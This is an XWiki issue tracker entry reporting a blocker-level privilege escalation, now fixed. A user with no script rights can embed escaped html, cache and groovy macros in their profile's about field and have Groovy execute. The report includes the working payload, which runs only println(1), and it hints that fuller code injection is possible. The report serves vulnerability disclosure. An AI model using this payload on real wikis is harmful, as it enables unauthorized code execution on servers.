Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
3.3-milestone-1
-
None
-
Unit
-
Unknown
-
N/A
-
N/A
-
Description
Steps to reproduce:
As a user without script or programming rights, edit the about section of your user profile and include
{{html wiki="true"}}~{~{~/~h~t~m~l~}~}~ ~{~{~c~a~c~h~e~}~}~{~{~g~r~o~o~v~y~}~}~p~r~i~n~t~l~n~(~1~)~{~{~/~g~r~o~o~v~y~}~}~{~{~/~c~a~c~h~e~}~}~{{/html}}
Expected result:
The user profile is normally displayed with an error that Groovy couldn't be executed.
Actual result:
1</p>{{/html}}</dd>
is displayed, followed by further raw HTML code, showing that the Groovy macro has been executed. This demonstrates a privilege escalation attack from account to programming rights. This attack is similar to XWIKI-20313 but instead of attacking UIX execution, this attacks the display of rich text properties. Note that with HTML comments, full unfiltered Groovy code could be introduced, but I assume that using features like GroovyShell#evaluate, further code could also be easily interpreted from a URL parameter without requiring characters that are lost due to the HTML sanitizer (didn't test).
Attachments
Issue Links
- links to